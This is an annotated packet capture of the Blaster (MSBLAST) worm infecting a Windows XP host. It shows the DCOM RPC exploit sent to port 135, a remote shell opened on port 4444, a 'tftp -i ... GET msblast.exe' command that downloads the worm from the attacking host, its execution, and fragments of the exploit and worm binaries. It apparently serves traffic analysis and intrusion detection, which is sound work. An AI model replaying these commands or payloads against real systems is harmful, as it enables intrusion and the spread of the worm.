MSBLAST.A Hacking pattern 08/15-11:17:24.711562 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56943 IpLen:20 DgmLen:48 DF ******S* Seq: 0xCA05EE77 Ack: 0x0 Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:24.712316 137.189.99.200:135 -> 205.186.81.25:1043 TCP TTL:128 TOS:0x0 ID:103 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xB08DABC Ack: 0xCA05EE78 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:25.335727 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56960 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA05EE78 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.509720 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56961 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0xCA05EE78 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20 ........H......................................F.....].......... +.H`.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.512318 137.189.99.200:135 -> 205.186.81.25:1043 TCP TTL:128 TOS:0x0 ID:104 IpLen:20 DgmLen:100 DF ***AP*** Seq: 0xB08DABD Ack: 0xCA05EEC0 Win: 0xFAA8 TcpLen: 20 ........<............)....135............]..........+.H`.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.855995 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56962 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0xCA05EEC0 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20 ....................................2$X..EdI.p..t,..`^.......... p^......|^..............*M...j. .nr.....MARB.................... ... ...MEOW...................F8..............F................ ............MEOW.....................................(..d)...... ...................F...............F...............F............ ...F...............F...............F...............F....`...X... ....@... ...8...0...............P...O.. ........................ ................................................................ H.....f................F....................x...X...........p... .O...=.W....2.1..................................C......`...`... MEOW...................F;..............F....0..............J.... Poz.....................................0...x.n................. /......................F.X.................0................... ........h.......h...........................\.\.F.X.N.B.F.X.F.X. N.B.F.X.F.X.F.X.F.X............................................. ................................................................ ................................................................ .........^1........6..2.................S..tWu.......Z....|..2.. .:k...M.q....2...Z...2.......A......6t...Z.~.$|..2..."k..LLb.... .2........y|.....2.........u..j..2..........x.z..2........9.V.J. .2............Z..2.........F..*..2....k.S....f...2...*...b...bk. ..L..Z...n.L.$..@d.......c.....P.W...Z........x.2.....].~'?bB... .vj......z...~...b..."...c...c.......".L..k.@d..wek. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.944240 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56963 IpLen:20 DgmLen:284 DF ***AP*** Seq: 0xCA05F474 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20 .....d.!.2..:...4r....9..:..4r........Q......g..4^..4w...7..j... 4h..b...4...J.k|..8.{F.Ap?.xT....&.a4h..bT..........41Qk..T.jm.. ..../...\.C.$.\.1.2.3.4.5.6.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1...d.o. c........... ...0.-......*..........(............... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.944542 137.189.99.200:135 -> 205.186.81.25:1043 TCP TTL:128 TOS:0x0 ID:105 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xB08DAF9 Ack: 0xCA05F568 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.950832 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56964 IpLen:20 DgmLen:40 DF ***A***F Seq: 0xCA05F568 Ack: 0xB08DABD Win: 0x16D0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.951104 137.189.99.200:135 -> 205.186.81.25:1043 TCP TTL:128 TOS:0x0 ID:106 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xB08DAF9 Ack: 0xCA05F569 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.951210 137.189.99.200:135 -> 205.186.81.25:1043 TCP TTL:128 TOS:0x0 ID:107 IpLen:20 DgmLen:40 DF ***A***F Seq: 0xB08DAF9 Ack: 0xCA05F569 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Open a remote shell on port 4444 at the TARGET 08/15-11:17:26.964427 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:56965 IpLen:20 DgmLen:48 DF ******S* Seq: 0xCA1A3C5A Ack: 0x0 Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:26.964711 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:108 IpLen:20 DgmLen:40 ***A*R** Seq: 0x0 Ack: 0xCA1A3C5B Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.070517 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56966 IpLen:20 DgmLen:40 DF *****R** Seq: 0xCA05F569 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.432648 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56967 IpLen:20 DgmLen:40 *****R** Seq: 0xCA05F568 Ack: 0xCA05F568 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.450470 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56968 IpLen:20 DgmLen:40 *****R** Seq: 0xCA05F569 Ack: 0xCA05F569 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.468662 205.186.81.25:1043 -> 137.189.99.200:135 TCP TTL:111 TOS:0x0 ID:56969 IpLen:20 DgmLen:40 *****R** Seq: 0xCA05F569 Ack: 0xCA05F569 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.915007 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:56986 IpLen:20 DgmLen:48 DF ******S* Seq: 0xCA1A3C5A Ack: 0x0 Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:27.915325 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:109 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xB15C83C Ack: 0xCA1A3C5B Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:28.421027 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:56987 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C5B Ack: 0xB15C83D Win: 0x16D0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Download the worm via TFTP from the source 08/15-11:17:28.509338 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:56988 IpLen:20 DgmLen:78 DF ***AP*** Seq: 0xCA1A3C5B Ack: 0xB15C83D Win: 0x16D0 TcpLen: 20 tftp -i 205.186.81.25 GET msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:28.640310 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:110 IpLen:20 DgmLen:79 DF ***AP*** Seq: 0xB15C83D Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20 Microsoft Windows XP [Version 5.1.2600] =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:28.762953 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:111 IpLen:20 DgmLen:48 Len: 28 ..msblast.exe.octet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:29.377219 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:56989 IpLen:20 DgmLen:544 Len: 524 ....MZ......................@................................... ............!..L.!This program cannot be run in DOS mode....$... ....PE..L...*|7?...............7. .......P...q...`........@..... ................................................................ ........H....................................................... ............................................................UPX0 .....P..............................UPX1..... ...`.............. ........@...UPX2................................@...1.22.UPX!... ...F =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:29.378736 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:112 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:29.381746 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:56990 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C81 Ack: 0xB15C864 Win: 0x16A9 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:29.382051 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:113 IpLen:20 DgmLen:143 DF ***AP*** Seq: 0xB15C864 Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20 ..(C) Copyright 1985-2001 Microsoft Corp.....C:\WINDOWS\system32 >tftp -i 205.186.81.25 GET msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:30.027365 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57000 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C81 Ack: 0xB15C8CB Win: 0x1642 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:30.376830 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:114 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:30.451366 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57001 IpLen:20 DgmLen:544 Len: 524 ...._...t0T...... ,..&..=....1.@.L$..A...t..D$..T$.......w...SVW ..Pj.h..@.d.5.......%. .X/p....t ;t....$$t..4v...T.H|...u.w....T ....d..5..._^[.U..\Uj....n.h.Z.u.....@]...]..{... ...#.]..E..0@% ..4.{k?..@.ur.E...E....w.....C..s-{..b..v....e.t:VU.k...]^M[.... .t(x1%Sr.v....e.V...6....C.0...\.%.4...,.qGj.v..a*.....z..j.s... @.._u!.........;..'...*P....P$.....!..(..=,......>...r..X..d.... .]5.h..U...f.P.I.#....e.P.<$f..$...,$c.(^{.}.$. ~.........$.H... P...o7.1..M.P*.....e.7...~...:l1.j.....P_?..fj]He.......?.j2h<.. .IH. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:30.452632 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:115 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:31.327318 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57017 IpLen:20 DgmLen:544 Len: 524 .......{..|hCH..L......=........`.k..v.PQR..../.-.%....L...a.".. ...lh.'.7.6.0ig....c[..D...NG.X....;.%,1@.4!.0Y.....{a.......G.= .J..85>...A......O.;.........\..>..w..C9.....6.E..@.0,T..[a..... 7x.@+I....=W}$h>.Z.H.{..X9..(.!.......0.Jxs.<.<..~.......).#.e.. ...8|R...F5...~...}. 94(.s.!g...~...S.Jx..u<|(1...[...j.......6< ...(T..,....:/..o#.Y.....}.W..~..f..4/..8.p.z....s..?.@.......N% ,U..8@8...2.....$`A....E.j..........wf....E0T...9w.f........203; .._J#.S..:.F.f....P..&........8.N.w....../1.h7.+.|.........C.... 7... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:31.328897 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:116 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:32.207793 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57018 IpLen:20 DgmLen:544 Len: 524 .....%..L.....V...(.........l........W........|"h..........s.V.. Y:...:....H.t........\.8@J.B......[...=....~"~..-.0...,.l.,G"0;0 ....^..0"!.#r.0.1(..?..(..........E..v..Np....h..?.. ._u.1.%..D. ....5..&X...Z./~f..W.3`G.......|...5.0.c.#.0.+.... H#....l.5..Y. .....`.m....a.... |.h...k.e.........x..t..........\89..|.t...... .;.(9.r..u.|@-vr.s.9..#.>"...P..w....!l}....9E..\G....|;.8... _. 9..%..K..:...1.Y?<...4)....^37...S.v.....u...n.A8h............u. 2...5..4..n......D..A..4....hD..<.y..x.....|......G.... 8..:5.m. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:32.208243 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:117 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:33.113666 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57019 IpLen:20 DgmLen:544 Len: 524 ....'.b%.w..`..!....~.......fc....|]....h.r`o.9..>p.{..V..&p..tH <..<#......<.x0...B.Kx.H&..............d......KF.....d.......... .....i0...H....O.k..!.....`......h...).\...r...!t...!..B.B\..... ....Z.El..b.!......^.MO.i... cn.$l....O...._..B...I,..A......... (.Y..h..0T..K.....@...^.sv.=.;[...Xaor..Kh....WF..m....@.<.WO,.. ........$h......h.F....C...}..8..d..r.m..<[.|R[L.Gvx/[G...A....M ..t..3.D@.)db5.\6.;.%(.....S..L$.1.........................t.... ............X...............$.(...V...:.8.......]CM........F..G. ...8 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:33.115215 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:118 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:34.112078 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:119 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:34.128000 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57036 IpLen:20 DgmLen:544 Len: 524 .......]5QD........G@..Y0,...{.\7..4..X...u..4..>....fa.......WV ..2j..H$...!.)...Q.......G..MIw~f#n#F.|.h..}rF..R....Zd.d..83... $..n...w..n.... .8I.Bnn.}..._.....E.Ej(../..u.....j............0 .I..[....*.P..A..2G...:..m..@...%.-..<..v5&..]....e.........W).. ...$d..la.......,.[..../.j.........z... ...b..<c...L..........+; ;..{=..x..~*.>. T...%.Q/.................................... ... ..R.2 .2...J2 .. ...p.....?"u#j".&.j.@.<0E}r...).G..G. t...G.... ./s_.. u...t.....t..W.D.L__....Y...-...$=.s.....).....,0.....48. ...< =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:34.128697 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:120 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:34.916282 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57037 IpLen:20 DgmLen:544 Len: 524 ....@D....HLP....TX....\`l....pt................................ ..E.6......@.....0@.<1@.....msblast.exe.I ju. wan.....to say LOV E YOU SAN!!.bill...m.gates&h.d%you make..~.1hi.possiQ.?1[{..Bp.i ng.one-Wd.... fix2r]oftireU..=o......H.................F..*..].. ........+.H`KG.........?...._..K.2$X..EdI.p..t,..`.>7.^..p.G|... ........*M...j. .nr..MA..~.RB3............36..EOW...`...8..0.(.. f.........C...@.A....(..6d_.d)....s..C2$C...$C2$...i./s`.X.@.... x...P....O.. ......._H.f.........+.x......d.p....O...=.W.W2.1'l .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:34.917748 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:121 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:35.819775 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57038 IpLen:20 DgmLen:544 Len: 524 ......C..s@....1@...;a...........J....Poz...l....0_n#l.'y... /.. ..c...F.?....6S.Gh...h...e..w_.\..o..C.$.1-3.4.5.6..~.d.sd.o.c.1 ,e.N.B.......'.........w...^1......6..2.................S..tWu.. ....Z....|......&..:k...M.q...6...Z..............A......6t.3.~.$ |..#.."LLb.........y|...........u..j...GF....x.z.9.V.J...g...... Z...F......*..k.S..f.....*.......b...bk...L..Z...n.L.$..@d...... }..c.'..P.W...Z........x.2.t.......].~'?bB....vj......z.~]^..b.. ."...c......."....[.k...wes._..d.!....o..:...4r...9..:&......... .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:35.820186 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:122 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:36.718626 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57039 IpLen:20 DgmLen:544 Len: 524 ....Q......g..4^..4w...7......j..h..b...4..J.|......8.{F.Ap?.xT. ...&.a#.T..............41Qk..T.jm...W/...id.W -..*....{..(...... D..wNtwsupd......com.%s...Q.+QI..tU.c..u-i. GET.%d..S.C~.%i..rb. ..6.\.A|IGY\.....u.b.SOFTW.....E\Micro.\W&[.(.\C..+V.^..er..\Ru. .I...^Y/".V.\V.W.JxV.V.....U.R..l..i.....S.4M...,8HM.4MP`p...... 4..SW...3.f..O.T.0..i.@Xl|..w..i...T?...; M...UK.$4M.4,8@HT.4M.` hp|....M..U...9A.P@...-[.(......G<.%l..r....T.`......./..,B.Exit ProcessK...Thread.GetComm.L.K4.ineA.D.For.t.n.g.L.Er=r.....Modul .i.N =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:36.719706 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:123 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:37.615930 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57040 IpLen:20 DgmLen:544 Len: 524 ....am1....MHEl.Clos......Tickeunt.RtlUn.n..M%.hMu.x3....S+ep.Te w...f.a.%...7{..lRegeKey.&.[...EL.SvValue...i66..__.aaA3.7.rg.2o i.e....wfcO.open.~.....mcpy..%r;.m..$..sig.l.prQX{0wtf..trc..... .`k~. I%.m...nGun.c.dS.f..t.#..Ah2n..P..i.*s.kui...u3_.dr.Foa.nW h.?v..helK...{.~. .t@.m....Ig.h.tb....y.m.bi..s..a..WSA....6vup. Cf..c...Bl:..:g..7.p.:EA*?..<PEL...*|7?....8......7........;!`0! @.....$..<`.O,;s.4......r P...!....t.....,{..?`.g...b.G.0K.Ru... .|a.\..d....'@.do.i(..$'F|.\`...O.....@.............`..`@....... W... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:37.616426 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:124 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:38.486363 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57041 IpLen:20 DgmLen:544 Len: 524 ..............F..G..u........r........u............s.u........s. 1....r......F...tt....u............u..........u A..u............ s.u........s.............../...v...B..GIu..c.................w.. ..L...^.........G,.<.w..?.u...._.f........)..................P.. ....t<._...0.p....P.....xp.....G..t...WH..U..|p....t...........p ..a............................................................. ................................................................ ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:38.489495 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:125 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:39.265333 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57042 IpLen:20 DgmLen:544 Len: 524 ....................x........................................... ................................................................ ............................$.......@.......KERNEL32.DLL.ADVAPI3 2.DLL.CRTDLL.DLL.WININET.DLL.WS2_32.DLL...LoadLibraryA..GetProcA ddress..ExitProcess...RegCloseKey...atoi..InternetGetConnectedSt ate...send...................................................... ................................................................ ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:39.265798 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:126 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:40.069496 205.186.81.25:69 -> 137.189.99.200:1030 UDP TTL:111 TOS:0x0 ID:57043 IpLen:20 DgmLen:64 Len: 44 ........ ....... ........&...0...B.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:40.070445 137.189.99.200:1030 -> 205.186.81.25:69 UDP TTL:128 TOS:0x0 ID:127 IpLen:20 DgmLen:32 Len: 12 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:40.088572 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:128 IpLen:20 DgmLen:101 DF ***AP*** Seq: 0xB15C8CB Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20 Transfer successful: 6176 bytes in 11 seconds, 561 bytes/s... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:40.789679 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57044 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C81 Ack: 0xB15C908 Win: 0x1605 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:40.789702 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:129 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0xB15C908 Ack: 0xCA1A3C81 Win: 0xFACA TcpLen: 20 ..C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.400056 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57045 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C81 Ack: 0xB15C91E Win: 0x15EF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.505872 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57046 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xCA1A3C81 Ack: 0xB15C91E Win: 0x15EF TcpLen: 20 start msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.506289 